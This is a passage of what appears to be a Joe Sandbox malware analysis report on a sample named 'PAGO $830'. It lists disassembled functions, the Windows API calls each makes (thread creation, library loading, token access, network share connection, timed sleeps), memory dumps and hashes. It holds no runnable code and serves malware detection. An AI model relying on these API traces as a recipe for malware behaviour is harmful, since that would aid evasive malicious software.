                                                          • CreateThread.KERNEL32(00000000,?,00D9CF89,00000000,00000004,00000000), ref: 00D9D1A8
                                                          • GetLastError.KERNEL32 ref: 00D9D1B4
                                                          • __dosmaperr.LIBCMT ref: 00D9D1BB
                                                          • ResumeThread.KERNEL32(00000000), ref: 00D9D1D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                          • String ID:
                                                          • API String ID: 173952441-0
                                                          • Opcode ID: db0bfae522f87b91867557c72706cbd2dae4867199eaab7e5a39480ff37dba0c
                                                          • Instruction ID: 32dd45a38c98e128578b96f66892a885856d6fbf8d31f5398fc32b97aba50aeb
                                                          • Opcode Fuzzy Hash: db0bfae522f87b91867557c72706cbd2dae4867199eaab7e5a39480ff37dba0c
                                                          • Instruction Fuzzy Hash: 2B01F133905304BFDF206BB6DC09BAA7A6AEF81730F244319F924A61E0CF718945C6B0
                                                          Function 00D779B6 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D779F4
                                                          • GetStockObject.GDI32(00000011), ref: 00D77A08
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D77A12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: d489047781f6977dca1970de8ba542fc218bcbfdf84dd5c7e1b98d6951f3ef92
                                                          • Instruction ID: 09da1e033e62ee78e663c91bd43343fe460d7494737fc61e18c673fc1275901f
                                                          • Opcode Fuzzy Hash: d489047781f6977dca1970de8ba542fc218bcbfdf84dd5c7e1b98d6951f3ef92
                                                          • Instruction Fuzzy Hash: 7911A172505508BFEF128FA19C40EEA7BA9EF58364F144116FA0862050D732DDA09BA1
                                                          Function 00D93ACC Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 00D93AE6
                                                            • Part of subcall function 00D93A33: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D93A62
                                                            • Part of subcall function 00D93A33: ___AdjustPointer.LIBCMT ref: 00D93A7D
                                                          • _UnwindNestedFrames.LIBCMT ref: 00D93AFB
                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D93B0C
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00D93B34
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                          • String ID:
                                                          • API String ID: 737400349-0
                                                          • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                          • Instruction ID: 98ba57254971859f28b6307b039f13964b07d1d5654aa7853b2e29c383157c8a
                                                          • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                          • Instruction Fuzzy Hash: A9014C32100148BBCF126E95CC42EEB7F7AEF58754F054014FE48A6121C332E961DBB0
                                                          Function 00DA3003 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00DB242E,00000000,00000000,?,00DA2FAA,00DB242E,00000000,00000000,00000000,?,00DA321B,00000006,FlsSetValue), ref: 00DA3035
                                                          • GetLastError.KERNEL32(?,00DA2FAA,00DB242E,00000000,00000000,00000000,?,00DA321B,00000006,FlsSetValue,00E122B0,FlsSetValue,00000000,00000364,?,00DA2DD6), ref: 00DA3041
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DA2FAA,00DB242E,00000000,00000000,00000000,?,00DA321B,00000006,FlsSetValue,00E122B0,FlsSetValue,00000000), ref: 00DA304F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: 77da0e0967c5c7801b9785eca146645547e60fb7985efd7e5fdd6ecebd41aa4a
                                                          • Instruction ID: 81be90107788a56d3c7cdb5e69faddf413ed5dd93b9154d8b4aa25dff4a77356
                                                          • Opcode Fuzzy Hash: 77da0e0967c5c7801b9785eca146645547e60fb7985efd7e5fdd6ecebd41aa4a
                                                          • Instruction Fuzzy Hash: 7D012B32611722AFCB314F7EAC44A677799AF07BA1B240720FA46E3180C721DA49C6F4
                                                          Function 00DD73BA Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00DD73D5
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DD73ED
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DD7402
                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00DD7420
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: e6702ac207e2d2422681ec5051ac1de67c69a8770464e3364c95ceca61bf9b1a
                                                          • Instruction ID: 3e07bbc0a905a26cdbaebdc62c747a0d15f011adbab54e3a74f610ce69b17784
                                                          • Opcode Fuzzy Hash: e6702ac207e2d2422681ec5051ac1de67c69a8770464e3364c95ceca61bf9b1a
                                                          • Instruction Fuzzy Hash: 3911A1B13463049FE3218F10DC09B967BFCFF00B04F5085AAA55AD7250E7B1E948DBA0
                                                          Function 00DDAFC6 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDABF1,?,00008000), ref: 00DDAFE2
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDABF1,?,00008000), ref: 00DDB007
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDABF1,?,00008000), ref: 00DDB011
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDABF1,?,00008000), ref: 00DDB044
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: 93e7f3dbdd7996cec77bbacf1663063599be31c0aca164578442488f287b1701
                                                          • Instruction ID: d71c300c5bb7e247bee333f92e905ce83caa044337d4476b167d4634d50876f7
                                                          • Opcode Fuzzy Hash: 93e7f3dbdd7996cec77bbacf1663063599be31c0aca164578442488f287b1701
                                                          • Instruction Fuzzy Hash: AB116131C0152CDBCF009FE9D958BEEBB78FF0A721F114197D991B2240CB3496948BA5
                                                          Function 00DD2CEB Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2D09
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2D1A
                                                          • GetCurrentThreadId.KERNEL32 ref: 00DD2D21
                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2D28
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 7da2a86503ee24e375bc1590faa369439a3f3bc5b14448a4cb7161aa4d6c3283
                                                          • Instruction ID: 65b12ae27e3cddca4e46811fc4fd35175104b28e5022906a6114dc459a17d55a
                                                          • Opcode Fuzzy Hash: 7da2a86503ee24e375bc1590faa369439a3f3bc5b14448a4cb7161aa4d6c3283
                                                          • Instruction Fuzzy Hash: 14E09B711412247ED7301773AC0EEF73E2DEF56F61F240215F105E11509692C884C1F0
                                                          Function 00E08755 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D8AB19
                                                            • Part of subcall function 00D8AABF: SelectObject.GDI32(?,00000000), ref: 00D8AB28
                                                            • Part of subcall function 00D8AABF: BeginPath.GDI32(?), ref: 00D8AB3F
                                                            • Part of subcall function 00D8AABF: SelectObject.GDI32(?,00000000), ref: 00D8AB68
                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E08779
                                                          • LineTo.GDI32(?,?,?), ref: 00E08786
                                                          • EndPath.GDI32(?), ref: 00E08796
                                                          • StrokePath.GDI32(?), ref: 00E087A4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: 24fd32ecba9d5fd8ef2814be453e1d5c178d2dfea184e763c68e6bfb96693ddf
                                                          • Instruction ID: 620c71f02a64badafa43f5d952d0e61a70d3cbd316e8afa2d06facaf3c9cfe42
                                                          • Opcode Fuzzy Hash: 24fd32ecba9d5fd8ef2814be453e1d5c178d2dfea184e763c68e6bfb96693ddf
                                                          • Instruction Fuzzy Hash: ADF05E36042258BEDB126F95AD09FCE3F69AF46310F288141FA11710E187B65595CBA5
                                                          Function 00D8AD30 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00D8AD4C
                                                          • SetTextColor.GDI32(?,?), ref: 00D8AD56
                                                          • SetBkMode.GDI32(?,00000001), ref: 00D8AD69
                                                          • GetStockObject.GDI32(00000005), ref: 00D8AD71
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Color$ModeObjectStockText
                                                          • String ID:
                                                          • API String ID: 4037423528-0
                                                          • Opcode ID: 7966b2b68ecceec5b3b3dc29cee230d2341ffe1ab264596017b8259a792eb570
                                                          • Instruction ID: 1418548bd854a861f210fdac28930d49dfde5e86732a39531dfcf9ad422e5f54
                                                          • Opcode Fuzzy Hash: 7966b2b68ecceec5b3b3dc29cee230d2341ffe1ab264596017b8259a792eb570
                                                          • Instruction Fuzzy Hash: ADE09B31244280AEDB215B75AC09BD83F21AF11336F288319F6F9580E1C37259C49F21
                                                          Function 00DD156F Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00DD1578
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DD111D), ref: 00DD157F
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DD111D), ref: 00DD158C
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DD111D), ref: 00DD1593
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: d369f2cf7c571519d187ee2958201926fb7041cef49fd7e1dc0b8dbe4fdd329e
                                                          • Instruction ID: 0d9ab9fb2c35272a7aca72dba426a86d4c4c33bac0d33a3114dae72628e5c6fc
                                                          • Opcode Fuzzy Hash: d369f2cf7c571519d187ee2958201926fb7041cef49fd7e1dc0b8dbe4fdd329e
                                                          • Instruction Fuzzy Hash: EFE04F35601211AFD6201BB2AD0CB563B7CDF44792F248505B246E9090D6794489C761
                                                          Function 00DCE008 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00DCE008
                                                          • GetDC.USER32(00000000), ref: 00DCE012
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DCE01E
                                                          • ReleaseDC.USER32(?), ref: 00DCE03F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: d4d330ecb804b27808fdbb8db72d867b74cbd6e03a09866e1406bb2609815319
                                                          • Instruction ID: f60aeed0a666da5edef5f5da6b2a339089abf59d6cb8ce9b92555c7fa1f62c2c
                                                          • Opcode Fuzzy Hash: d4d330ecb804b27808fdbb8db72d867b74cbd6e03a09866e1406bb2609815319
                                                          • Instruction Fuzzy Hash: 11E04FB1C00201EFCF109FB1D808A6DBBB1EB0C714B208544E84AF3390CB3A5985DF20
                                                          Function 00DE4CA5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D78FA0: _wcslen.LIBCMT ref: 00D78FA5
                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DE4DF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Connection_wcslen
                                                          • String ID: *$LPT
                                                          • API String ID: 1725874428-3443410124
                                                          • Opcode ID: 25a677089786cd3c04f473152c94271177b5a34e7ff0274103847cd61ef47785
                                                          • Instruction ID: 02da9c97e92dcc8d328bad2fd8b7e6bfd6b14793b7a19e65ac63e866421a46e3
                                                          • Opcode Fuzzy Hash: 25a677089786cd3c04f473152c94271177b5a34e7ff0274103847cd61ef47785
                                                          • Instruction Fuzzy Hash: 08916C75A002449FCB14EF55C484EA9BBF1FF48704F188099E84A9F362D775EE85CBA1
                                                          Function 00D9E20D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 00D9E29D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: 4422fd5381d97d095d0ef34330e142fbb0d788838fd3321ed0d5aad2c93416c9
                                                          • Instruction ID: 3a336f9d1721a7300d6647907f7d403f64b5e9eee77f945c13295f6fc3d60c41
                                                          • Opcode Fuzzy Hash: 4422fd5381d97d095d0ef34330e142fbb0d788838fd3321ed0d5aad2c93416c9
                                                          • Instruction Fuzzy Hash: 58516071A0C102D6CF15BB14CD013792BA8EB41751F388D99F0D5522E9DB35CCD69ABA
                                                          Function 00DF7698 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(00DC6279,00000000,?,00E0D0D0,?,00000000,00000000), ref: 00DF7804
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • CharUpperBuffW.USER32(00DC6279,00000000,?,00E0D0D0,00000000,?,00000000,00000000), ref: 00DF7762
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper$_wcslen
                                                          • String ID: Ls
                                                          • API String ID: 3544283678-1452845052
                                                          • Opcode ID: e25884578ffb00579aa4b9e4556c011fb14062006b2d575a8c6ecd536888432b
                                                          • Instruction ID: b829f30ce606dbe61529a7aa6dc869d3d34e75de3393d055971dab51749d86c9
                                                          • Opcode Fuzzy Hash: e25884578ffb00579aa4b9e4556c011fb14062006b2d575a8c6ecd536888432b
                                                          • Instruction Fuzzy Hash: 7C612D32924219AACF14FBE4DC95DFD7778FF18300B449029E64666091FF609A49CBB0
                                                          Function 00D728C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: f92a97b72590d97ca515ce31ec938a67d5d2ddf874112f29ae01cd43a2b7dacd
                                                          • Instruction ID: 4c4f88ee095211007b2225aefa155f18f3d9b003a856a2b5f994fb431d4a7e4b
                                                          • Opcode Fuzzy Hash: f92a97b72590d97ca515ce31ec938a67d5d2ddf874112f29ae01cd43a2b7dacd
                                                          • Instruction Fuzzy Hash: FF51E332905246DFCB159F29C491AFA77B0EF19310F68805AFD969B290E734DD46CB70
                                                          Function 00D8F370 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00D8F381
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D8F39A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
